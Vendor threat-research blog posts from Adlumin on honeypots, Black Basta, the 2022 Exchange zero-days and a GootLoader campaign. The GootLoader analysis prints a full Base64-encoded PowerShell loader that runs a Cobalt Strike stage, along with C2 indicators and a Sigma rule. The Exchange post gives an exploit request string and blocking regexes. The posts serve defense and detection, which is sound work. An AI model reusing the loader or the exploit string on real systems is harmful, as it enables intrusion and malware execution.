Articles written by Adlumin’s Threat Research Team on emerging threats, industry stats, and defense tactics against cyberattacks.

Honeypots 101: Origin, Services, and Types

By: Kevin O’Connor, Director of Threat Research

The Origin of the Honeypot

In the 1980s, honeypots became a permanent fixture in cybersecurity, riding the lines of defensive and deception technologies. The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage, published by Clifford Stoll in 1989, details the hunt for a computer hacker (later identified to be Markus Hess) who digitally broke into Lawrence Berkley National Laboratory (LBNL) in 1986[1]. Stoll provides one of the first descriptions of what is known today as a honeypot.

To catch the hacker, Stoll set up an elaborate ploy by inventing a fictitious department under an imaginary contract within a real organization under LBNL that Stoll suspected the hacker was targeting. Creating a fake user working for the faux organization, Stoll filled the user’s digital assets with attractive-looking documents designed to gain the hacker’s attention and lure them into grabbing the files. His efforts would ultimately lead to discovering the hacker’s identity as Hess and the following arrest in Germany.

After Stoll flew to Germany and testified against Hess, it became public that Hess had been selling the bounty of his hacking operations against organizations like LBNL to the Soviet Union’s KGB intelligence agency. They would also work out that a Hungarian agent had contacted the fictitious LBNL department using information that could have only been sourced from Hess. This was part of the KGB’s standard routine to verify Hess’s information.

Later, in 1991, Bill Cheswick, considered one of the pioneers of computer security, published An Evening with Berferd in Which a Cracker is Lured, Endured, and Studied[2]. The Chronicle, one of the earliest technical descriptions of a honeypot, details leading a hacker on a “merry chase” to trace his location and learn his techniques. It details the bait and traps used to lure him and is the work that first applied and popularized the terminology of “jail” in cyber security. Cheswick had created a digital jail to trap the actor and watch their actions in detail[3].

The concept of a honeypot has come a long way since its first use in the 1980s. Pioneers like Stoll and Cheswick were instrumental in laying the foundation for what has become an essential component of modern cybersecurity strategies. With the advancements in technology and the increasing sophistication of cyber-attacks, the use of honeypots has evolved over the years. Today, honeypots are used for defense, research, threat intelligence gathering, and incident response. Let’s explore the current usage landscape of honeypots in the field of cybersecurity and some considerations in deployment and usage.

What is a Honeypot?

Honeypots are security systems that lure cyber attackers and track their activities in a secure, isolated, and monitored environment. Honeypots can distract potential attacks from a target’s critical resources; act as an intelligence-gathering platform about attacks and their tactics, techniques, and procedures (TTPs); and strengthen security overall. Information collected by honeypots can also be used to identify vulnerabilities in a system, software, or protocol. They are, in essence, a decoy computer system meant to attract, trap, and expose potential attackers. As attackers are drawn to the honeypot and focus their efforts there, more valuable systems and data are protected by the attacker’s exposure through the honeypot. A well-designed and implemented honeypot is isolated from the rest of the network. It does not contain any sensitive information, so there is no risk of the attacker compromising it and accessing sensitive data.

Common Honeypot Services

Modern honeypots will typically work to provide “jailed” access to systems over specific protocols and their related applications, such as email, web services, and network administration services. These targeted applications may present high-value access to the target, data collection, theft opportunities, or an easy way to compromise and pivot through an organization’s and network’s systems.

Common services that are often developed into honeypots include:

  • File Transfer Protocol (FTP)
  • Telnet
  • Secure Shell (SSH)
  • HTTP Web Services
  • MySQL or Database Specific Applications
  • Administrative Applications
  • Other Remote Access Methods (VPNs, Remote Desktops, and remote support apps)

Most network and computer services can be adapted into a honeypot with the proper modifications. Which honeypot services your organization deploys will depend on its legitimate services, attack surface, and known attacker motivations.

Types of Honeypots

Honeypots come in various forms and have evolved to meet the changing threat landscape. Several types of honeypots are designed to cater to specific security needs.

  1. Low-interaction honeypots are designed to simulate a limited number of services and are less complex to implement, making them ideal for small-scale organizations. On the other hand, high-interaction honeypots offer a much more realistic and complex environment and are designed for organizations with larger security teams[4].
  2. Another type of honeypot is a hybrid honeypot, which is a combination of low-interaction and high-interaction honeypots. This honeypot balances complexity and ease of deployment, making it ideal for medium-sized organizations.
  3. Virtual honeypots simulate a network environment and lure attackers into a virtual and often restricted or more heavily monitored network enclave.
  4. Honeypots can also be combined to create a honeynet or honeyfarm, a network of honeypots used to monitor and track attacker activities. Honeynets are often used to gather information about and monitor large-scale attacks, such as distributed denial-of-service (DDoS) attacks.

Through pioneers like Stoll and Cheswick, honeypots have evolved from simple traps used to study and track hackers to complex security solutions that detect, prevent, and respond to cyber threats. The term “honeypot” has become synonymous with deceptive security technologies, and the concept is widely used in various industries, from financial services to healthcare, to protect against cyberattacks. And regardless of the type, honeypots are an indispensable tool in any cybersecurity arsenal that is crucial in detecting and mitigating cyber-attacks.

Visit the Adlumin for Honeypots resource page for more information on expanding your defenses with deception technology.

References

  1. Stoll, C. (1989). The Cuckoo’s Egg: Inside the world of Computer Espionage. Doubleday.
  2. Cheswick, B. (n.d.). Biography. Bill Cheswick’s bio. Retrieved January 30, 2023, from https://www.cheswick.com/ches/bio.html
  3. Cheswick, B. (1992). https://cheswick.com/ches/papers/berferd.pdf. Winter USENIX Conference, San Francisco, 20–24. https://doi.org/https://cheswick.com/ches/papers/berferd.pdf
  4. Edgar, T. W., & Manz, D. O. (2017). Research methods for cyber security. Syngress, an imprint of Elsevier.

The Need to Know: Black Basta Ransomware Gang

By: Mark Sangster, Chief of Strategy, and Kevin O’Connor, Director of Threat Research

Virulent Ransomware Gang Has Ties to FIN7 State-Sponsored Group

Discovery of Ransomware Gang FIN7

I discovered a rather clever adversary targeting investment firms in New York almost ten years ago. At the time, the group used Microsoft Macros to launch a fake Windows log-in pane to harvest credentials. Once an account was compromised, the adversaries would use it to send the phishing to the next victim. From that account, they moved to the next, and so on, until they captured key accounts at 70 funds. The number might sound small, but these firms managed billions in funds, so much so that the Security Exchange Commission (SEC) was concerned about a campaign to destabilize the economy, slowly crawling back from the 2008 subprime lending market collapse. The Russian-affiliated group was eventually labeled FIN7.

Black Basta Ransomware Gang Emerges

Fast forward to the present, and FIN7 crosses my desk. Yahoo! Finance asked me to comment on several ransomware attacks on food services and a grocery chain. It turns out the culprit, another Russian gang, Black Basta, had left its ransomware mark on over 50 victims since April of this year. According to SentinelOne research, there are trademark FIN7 (also called Carbanak) tactics and tools, including evasion tools and backdoor malware.

While FIN7’s original focus was financial data and institutions, a shift to a broader market, associations and the food industry is no surprise. Destabilizing food supply or heat utilities in the winter tend to create social angst and lead to eroded faith in the government to protect its citizens. While groups like Black Basta are primarily driven by financial gain, ideological impact as a byproduct is a free benefit.

A Political Big Brother: Russia

Given the hostilities in Ukraine, Russian retaliation against western countries providing support to Ukraine was deemed fair game for cybercriminals (like they were ever offside). Many of these groups (like Black Basta) either operate with impunity in Russia or some level of collusion or coordination with Russian agents.

FIN7 and Black Basta share more than ideology; a political big brother to protect them and target organizations. FIN7 technology brought nation-state capabilities to smaller ransomware gangs before ransomware-as-a-service with a thing (RaaS). They set the benchmark for researching their targets and using tactics that emulate insiders or actors that appear to be “in the know” of confidential information.

Ransomware Tactics Used

Ransomware gangs, like Black Basta, leveraged multi-extortion techniques (not unique), with enviable defense evasion and late manifesting symptoms that hide their presence until the ransomware detonation. They also rely on commodity malware like living off-the-land exploitation techniques, including the ever-growing popularity of Quakbot, PowerShell, WMI, netcat (used for lateral tunneling), mimikatz, CobaltStrike, and Coroxy. They’re also known for using the PrintNightmare vulnerability (CVE-2021-34527) for lateral movement, which can run on Linux against VMWare hypervisors to encrypt multiple hypervisor-hosted systems.

While sophisticated, they still rely on unpatched vulnerabilities, broad administrative access, and unguarded entry points. Consider Black Basta master chefs who can make delicious meals with reliable ingredients. Similarly, their encryption algorithm, ChaCha20, uses a robust RSA-4096 key but requires administrative privilege to execute.

Now What? CIS Controls to Implement

It’s a good news / bad news story. The bad news is that one of the most sophisticated ransomware gangs is back on the prowl. The good news is that they are mortal and can be stopped. They still use conventional tactics to infiltrate their targets: open vulnerabilities, unencrypted remote access points, exposed credentials, and over-provisioning administrative privilege. All of these tactics are detectable. Unfortunately, your insurance firm’s paneled incident response firm usually finds them as part of your claim.

The Center for Internet Security (CIS) is an excellent place for organizations to build a strong cybersecurity posture. CIS provides 18 controls for organizations of all sizes to safeguard data and mitigate cyber-attacks or ransomware attacks against their networks and systems. Here are just a few to get started with:

CIS Security Controls

  • CIS Control 7: Continuous Vulnerability Management (CVM)
    • CVM covers one of the 18 controls by closing the gaps between significantly reducing risk and security assessments. Managing vulnerabilities and understanding is a continuous activity requiring the focus of resources, time, and attention. CVM assesses and tracks vulnerabilities on all enterprise assets within the infrastructure. It minimizes and remediates the window of opportunity for cybercriminals.
  • CIS Control 8: Audit Log Management
    • Audit log management is the process of recording any activity used across an organization within the software systems. Audit logs document any occurrence of an event, the impacted entity, when it occurred, and who is responsible. In addition, compliance regulations require logs to be kept for a certain amount of time. Ensuring organizations collect, review, retain, and alert audit logs of events helps recover from an attack quicker.
  • CIS Control 14: Proactive Security Awareness
    • Employees are every organization’s first line of defense. It is critical to arm them with the proper knowledge and skills to properly identify and report any suspicious activity. A Proactive Security Awareness Program empowers employees with the needed expertise. Security software can only defend for so long until someone clicks a malicious link- take the proactive approach.
  • CIS Control 18: Penetration Testing
    • A penetration test or ‘ethical hacking’ evaluates the security of a system by attempting to breach accessibility, integrity, or confidentiality. A test provides real-world penetration scenarios covering industry-specific threat assessments offering actionable recommendations and rapid results.

The Adlumin Advantage

As co-founder and CEO of Adlumin, Robert Johnston is fond of saying even the biggest hacks had common factors and tactics. While companies were spending millions in the wake of massive data breaches, for a fraction of that cost, they could stop these common criminal chokepoints.

The Adlumin Security Operations Platform is designed to detect sophisticated tactics used by state-sponsored actors and provide simple response capabilities to disable compromised accounts, deactivate remote access services when suspicious activity is present, and identify event manipulation like creating unreconciled users or promoting account privileges. With Adlumin, you can stop these attacks early in the life cycle and prevent them from disrupting your business.

Are your Security Defenses Ready?

For more information, contact one of our cybersecurity experts for a demo to get started.

‘Tis the Season.
The Twelve Gifts of Cyber.

Event details:

Thursday, December 15, 2022
On-Demand Webinar

Presenters:

Mark Sangster, Chief of Strategy at Adlumin
Kevin O’Connor, Director of Threat Research at Adlumin

About this talk:

On the first day of access, the criminal deployed to me… ransomware delivered remotely!

Watch Chief of Strategy Mark Sangster and Director of Threat Research Kevin O’Connor as they take a whimsical look at 12 cyber trends and lessons covering ransomware attacks, GootLoader gang activity, and cyber stocking stuffers. You’ll also hear directly from customers how Adlumin’s helping them enjoy and relax over the holidays.

What you will learn:

  • New findings in ransomware trends and how to protect against them
  • Lessons learned about the GootLoader gang (definitely on the naughty list)
  • How to give a boost to your EDR and NGAV
  • Why continuous vulnerability management helps to keep the grinch away


New Unpatched Microsoft Exchange Vulnerabilities - Remote Code Execution Vulnerabilities Allowing Potential Attacker Access

By: Director of Threat Research, Kevin O’Connor

Microsoft has confirmed a new pair of unpatched vulnerabilities affecting its Exchange mail server platform. Tracked as CVE-2022-41040 and CVE-2022-41082, Microsoft validated the exploits’ existence and confirmed they are actively being used in the wild by malicious actors to compromise systems. This vulnerability is believed only to affect on-premises instances of Microsoft Exchange contained in Microsoft Windows Server 2013, 2016, and 2019, and not cloud-based Microsoft O365 mail applications and services such as Exchange Online, which Microsoft attests has detections and mitigations already in place. Microsoft Exchange Online customers do not need to take any action.

What you Need to Know

Microsoft does not currently have a patch available for the vulnerabilities but recommends that on-premise Microsoft Exchange customers should review and apply URL Rewrite Instructions and block exposed Remote PowerShell Ports. A guide by Microsoft for adding the blocking rule can be found here.

Add A Blocking Rule

  • Open the IIS Manager.
  • Expand the Default Web Site.
  • Select Autodiscover.
  • In the Feature View, click URL Rewrite.
  • In the Actions Pane on the right-hand side, click Add Rules.
  • Select Request Blocking and Click OK
  • Add the following string and click OK:
    • .*autodiscover\.json.*\@.*Powershell.*
  • Expand the rule and select the rule and click Edit under Conditions
  • Change the condition input from {URL} to {REQUEST_URI}

Blocking PowerShell Ports

Block the following ports used for Remote PowerShell

HTTP: 5985

HTTPS: 5986

The pair of CVEs are Server-Side Request Forgery (SSRF) (CVE-2022-41040) and Remote Code Execution (RCE) (CVE-2022-41082) vulnerabilities. The SSRF vulnerability can only be used by authenticated attackers suggesting that credentialed or other authorized access is needed to exploit the system. The SSRF vulnerability can then be used to enable the usage of the RCE vulnerability.

The vulnerabilities were uncovered by GTSC, a Vietnamese security company, during monitoring and incident response services in live networks. GTSC detected exploit requests in ISS logs with the same format as the previous 2021 ProxyShell RCE vulnerability:

autodiscover/autodiscover.json?@/&Email=autodiscover/autodiscover.json%3f@

It’s been observed in the wild that the CVEs have been used to drop webshells on exploited Exchange servers, including Antsword, a Chinese opensource cross-platform website administration tool supporting webshell management. The webshell’s codepage is also set to a Microsoft character encoding for simplified Chinese, again suggesting China-based actor involvement. During these exploitation campaigns, attackers leveraging the vulnerabilities also modified the file RedirSuiteServiceProxy.aspx to contain a webshell. GTSC also reported the use of SharPyShell, a small and obfuscated ASP.net webshell for C# web applications.

As part of their Tactics, Techniques, and Procedures (TTPs), attackers exploiting the vulnerabilities have also been observed leveraging the native Windows binary, certutil.exe, to connect to command-and-control infrastructure and retrieve malicious payloads. Some of the commands share similarities with those used by the Chinese Chopper web shell malware. The attackers also leverage in-memory DLL injection and native Windows WMIC systems to execute files.

To identify potential exploitation leveraging these vulnerabilities, administrators can check Microsoft IIS Logs for the following string indicating potential compromise:

    powershell.*autodiscover\.json.*\@.*200

Microsoft is currently working to develop a patch for the vulnerabilities; however, Microsoft Exchange administrators should take immediate action to defend systems and search for prior signs of compromise.

Keeping a network secure from zero-day exploitation requires a layered defense-in-depth approach. Externally available services such as email servers continue to be a prime target for exploitation by threat actors. Systems such as Adlumin’s Perimeter Defense capabilities can monitor these external systems for the appearance of exploitation artifacts such as newly opened ports on internet-accessible servers used for remote exploitation interfaces such as PowerShell.

Continuous Monitoring

Adlumin recommends using a Continuous Vulnerability Management (CVM) product to collect the needed data from endpoints to determine if they are running vulnerable versions of Microsoft Windows and Office. CVM software can also be used to identify those assets which have or do not have the official Microsoft mitigation in place. Adlumin also recommends leveraging the business’s SIEM product to continually search and alert for suspicious executions which may be a result of the exploitation of the vulnerability.

Resources

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-41040
  3. https://gteltsc. vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server (Deprecated)
  4. https://www.techtarget.com/whatis/feature/Everything-you-need-to-know-about-ProxyShell-vulnerabilities
  5. https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
  6. https://github.com/antonioCoco/SharPyShell

Everything you Need to Know about Tracking GootLoader

By: Kyle Auer & Kevin O’Connor
Adlumin’s Threat Visibility Team has observed an increase in GootLoader-based malware and identified a possible unified campaign leveraging GootLoader with follow-on Cobalt Strike payloads in attempts to breach U.S. businesses including multiple Adlumin customers.

What is GootLoader?

GootLoader is a presumed access-as-a-service malware 1, with its developers also being responsible for the GootKit malware as first reported by Dr. Web in 2014 2. GootKit, the actor’s namesake and original toolkit, is distinct from GootLoader in that GootLoader is closer to an initial access capability which leverages follow on stages such as Cobalt Strike, various Ransomware payloads, and potentially GootKit – the latter of which has fallen out of favor since gaining notoriety in 2019 due to infrastructure compromise 3.
As an access-as-a-service malware, the GootLoader operators would be expected to sell direct access to compromised hosts and systems or provide buyers with harvested credentials and access points into a targeted network. A less frequent operation under this model might involve the GootLoader actors loading second-stage payloads as access brokers.

Tracking the Campaign

Adlumin is observing and tracking an active exploitation campaign utilizing GootLoader against U.S. businesses in multiple industries and verticals. What we’ve observed in this campaign is uniform deployment of Cobalt Strike payloads following exploitation and initial access provided by GootLoader. It’s unknown if these Cobalt Strike payloads are used by GootLoader developers to provide direct access to an infected target or used to harvest credentials and other data which is brokered to a buyer for access or exploited in some other way.
Our investigation is tracking an exploitation campaign which we defined based on:

  1. Like to identical initial access and exploit methodologies
  2. Like to identical command and control infrastructure and methodology
  3. Like to identical operations time-frame
  4. Like to identical first-stage “loader” malware, GootLoader
  5. Like to identical second-stage follow-on malware, Cobalt Strike

Campaign Tactics, Techniques, and Procedures (TTPs)

This GootLoader campaign begins its attack by phishing potential victims’ business emails. Unlike other campaigns reported earlier in 2021 and 20224, this campaign has not yet been observed relying on specific SEO poisoning attacks to deliver its payload. We believe the payloads are also not being disguised as legitimate JQuery libraries as previously seen.
It starts with an email…

Figure 1: The Attack Begins with a Malicious JavaScript file contained in a Zip Archive

The first stage in the campaign against a target is a simple phishing email. These emails have an attached Zip archive, which contains a JavaScript payload the victim is tricked in to running after opening. This JavaScript payload is executed by a Windows Operating System native binary, Windows Script Host (wscript.exe), which is a legitimate application typically used for logon scripts, administration, and automation and provides an execution environment in which the script can run. Our team believes that the JavaScript payload is delivered via a compressed archive to help mitigate detection by email and malware scanners.

GootLoader_Image_2

Figure 2: JavaScript is executed by wscript.exe

GootLoader will then use this wscript.exe executing JavaScript to download an additional  JavaScript resource which is loaded by the original calling wscript.exe process. This secondary exploitation payload is responsible for persisting two separate payloads.

GootLoader_Image_3

Figure 3: wscript.exe retrieves payloads from Command and Control Server

Persistence

GootLoader will use its secondary JavaScript payload to write two registry keys to the Window’s Current User registry hive (HKCU). In this tracked campaign the two registry keys were stored in:

  • HKCU:\\Software\Microsoft\Phone\user0
  • HKCU:\\Software\Microsoft\Phone\user

GootLoader_Image_4

Figure 4: wscript.exe runs PowerShell to persist malware as a task, and writes encoded payloads to registry

Kick-Off

After having saved the next two stages to the registry, the wscript.exe process will execute PowerShell to run PowerShell commands which will kick-off the first-stage malware implant. To help evade detection by security software, the executed PowerShell commands make use of multiple evasion techniques including

  • Base64 Encoding the Command
  • Command abbreviation
  • Variable substitution
  • String concatenation
    • MwA1ADEANAA5ADcAOAA5ADsAcwBsAGUAZQBwACAALQBzACAANwA4ADsAJABqAHQAPQBHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAKAAiAGgAawAiACsAIgBjAHUAOgBcAHMAbwBmACIAKwAiAHQAdwAiACsAIgBhAHIAZQBcAG0AaQBjACIAKwAiAHIAbwBzACIAKwAiAG8AZgB0AFwAUABoAG8AbgBlAFwAIgArAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6ACgAIgB1AHMAZQAiACsAIgByAG4AIgArACIAYQBtAGUAIgApACsAIgAwACIAKQA7AGYAbwByACAAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAZQAgADcAMAAwADsAJABzAHUAcwArACsAKQB7AFQAcgB5AHsAJABzAGEAKwA9ACQAagB0AC4AJABzAHUAcwB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAcwB1AHMAPQAwADsAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAkAHMAdQBzACsAKwA7ACQAawBvAD0AWwBtAGEAdABoAF0AOgA6ACgAIgBzAHEAIgArACIAcgB0ACIAKQAoACQAcwB1AHMAKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAaABpAHQAPQAkAHMAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAGUAagB2AD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJABoAGkAdAAuAEwAZQBuAGcAdABoAC8AMgApADsAZgBvAHIAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAdAAgACQAaABpAHQALgBMAGUAbgBnAHQAaAA7ACQAcwB1AHMAKwA9ADIAKQB7ACQAZQBqAHYAWwAkAHMAdQBzAC8AMgBdAD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6ACgAIgBUAG8AQgAiACsAIgB5AHQAZQAiACkAKAAkAGgAaQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdQBzACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABlAGoAdgApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA3ADQANAA0ADkAMQA3ADIAOwA=

Decoding from Base64 and encoding with UTF-16LE we can see the commands contents:

GootLoader_Image_5

Figure 5: Decoded PowerShell Command Loading Stage 1 Implant

This command will grab the contents of the first registry key, HKCU:/SOFTWARE/Microsoft/phone/$USERNAME0, decode the encoded .NET DLL it contains, and then run the Test() function contained in the DLL us as an execution start point.

Obtaining Decoded Stage-1

To get the malware to drop the DLL unencoded for further analysis rather than directly loading and calling it via PowerShell, we modified the executed PowerShell command to write the contents to a file by appending the following before the last SLEEPfunction.

                  +> Set-Content $PATH -Value $ejv -Encoding Byte

This allowed us to analyze this first-stage implant to identify that the Test() function was being used to load the second-stage implant.

GootLoader_Image_6

Figure 6: PowerShell.exe decodes the GootLoader implant which decodes and runs the secondary payload, Cobalt Strike

Second Stage Payload

The second payload and malware implant used by GootLoader in this campaign is Cobalt Strike. The second registry key written in the earlier stage to HKCU:\..Phone\$USERNAME contains an encoded Cobalt Strike beacon. When the first-stage’s Test() function is executed, it decodes, loads, and executes the Cobalt Strike beacon into memory.

To analyze the Cobalt Strike beacon we modified the retrieved first payload which loads the beacon, to instead write the beacon unencoded to disk for retrieval and analysis. We did this by adding additional library imports used for writing a file and adding a main function which will call the Test() loader.

GootLoader_Image_7

Figure 7: Adding additional imports to 1st Stage Malware Implant

GootLoader_Image_8

Figure 8: Adding function to call the 2nd Stage DLL’s Test() function

We then created a BinaryWriter object and comment out some of the lines which would execute the Cobalt Strike beacon.

Figure 9: Modifying 1st stage to prevent 2nd stage execution and retrieve decoded 2nd stage

After building and running the code, we obtained the decoded second-stage Cobalt Strike payload.

Extracting Campaign IOCs from Cobalt Strike

Cobalt Strike is a paid penetration testing software which includes configurable malware implants that are often repurposed for use in real malware operations and infections. The Cobalt Strike beacon provides functionality for the attacker including command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained[5].Cobalt Strike has exploded in popularity in usage by cyber-criminals[6], and is a perfect launching platform for continued attacks or access transfer.

Once we had the decoded Cobalt Strike beacon written to disk, we were able to use public decoders to extract Cobalt Strike configuration information such as command and control addresses. We used the Python-based Cobalt Strike Configuration Extractor and Parser which can be found on GitHub, here.

Figure 10: Decoded Cobalt Strike Beacon Payload

This allowed us to obtain the malware command and control infrastructure used by the attackers to control the Cobalt Strike implant.

Figure 11: Cobalt Strike is run and beacons to Cobalt Strike command and control server

Summary & Future Reads

Once Adlumin’s Threat Visibility Team had the initial payload, follow-on implant stages, and leads on command-and-control infrastructure, we quickly created detections for our MDR platform, which merges data from multiple security relevant data sources including the endpoint and installed security software. These detections caught subsequent attacks from the same campaign and identified some historical retroactive activity. Some key defenses and mitigations for the campaign include:

  • Adequate phishing mitigation and attachment scanning solutions
  • Monitoring of wscript.exe executions of JavaScript files from compressed archives
  • Monitoring of PowerShell executions, especially of encoded commands, which have a parent process of wscript.exe
  • Implementing a Proactive Defense program that is equipped with fully managed security awareness testing and training, designed to empower employees to recognize and reduce the risk posed by cybercriminals.

Additionally, Adlumin is sharing the following indicators used in this campaign with the community:

  • 93[.]115[.]29[.]50
  • hxxps://streamlock[.]net

We’d also like to share the below Sigma rule to help identify possible exploitation activity:

title: GootLoader Zipped JS WScript
id: 37d82863-216a-41a3-a4de-b09cea08eb92
action: global
status: experimental
references:
– https://adlumin.com
date: 2022/09/26
tags:
– attack.execution
– attack.t1059
author: Adlumin, Kyle Auer, Kevin O’Connor
detection:
condition: selection
level: medium
logsource:
category: process_execution
product: windows
detection:
selection_1:
Image|endswith:
– ‘\powershell.exe’
ParentImage|endswith
– ‘\wscript.exe’
selection_2:
Image|endswith:
– ‘\wscript.exe’
selection_3:
CommandLine|all:
– ‘*AppData*’
– ‘*zip*’
– ‘*.js*’
condition: (selection_1 or selection_2) and selection_3

Make sure to follow Adlumin for follow-up posts where we’ll dive deeper into the actor’s infrastructure and operations!

Resources:

  1. https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html
  2. https://securelist.com/gootkit-the-cautious-trojan/102731/
  3. https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/
  4. https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader
  5. https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
  6. https://threatpost.com/cobalt-strike-cybercrooks/167368/

On the Trail of Bigfoot: Threat Hunting that Protects Your Business from Cyber Risks

Event details:

Wednesday, June 22, 2022
On-Demand Webinar

Presenters:

Mark Sangster, Chief of Strategy at Adlumin
Kevin O’Connor, Director of Threat Research at Adlumin

About this talk:

Malware poses a significant threat to businesses across all industries. Cybercriminals operate like Fortune 500 companies, optimizing their operations with superior technology and expertise and increasing revenue regarding ransoms and other illicit gains from their attacks. As criminals uplevel their ability to infiltrate and exploit your business, proactive threat hunting is non-negotiable for stopping malware-based attacks before they become business-disrupting or cripple operations.

Adlumin’s Chief of Strategy, Mark Sangster and Director of Threat Research, Kevin O’Connor, unpack real-life examples of how the company’s Threat Intel Team leverages observables and Indicators of Compromise (IoCs) to stop attacks in their tracks.